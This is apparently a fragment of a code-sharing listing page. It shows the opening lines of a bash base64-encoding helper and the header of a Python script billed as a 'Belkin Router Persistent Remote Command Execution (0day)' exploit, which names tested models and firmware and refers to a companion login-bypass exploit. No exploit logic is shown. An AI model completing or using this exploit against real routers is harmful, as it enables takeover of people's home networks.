This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #/bin/bash | |
| base64encode(){ | |
| local base64chars="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" | |
| local res="" | |
| for i in $(seq 0 3 $((${#1}-1))) | |
| do | |
| local n1=$(printf '%d' "'${1:i+0:1}") | |
| local n2=$(printf '%d' "'${1:i+1:1}") |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # Belkin Router Persistent Remote Command Execution (0day) | |
| # Tested models: F7D4401, F7D4301 | |
| # Tested firmware: 1.00.46 (latest firmware) | |
| # You bust be loggedin to run this exploit (you can use belkin_login_bypass.py exploit) | |
| # Author BigNerd95 | |
| import sys, requests, re |
NewerOlder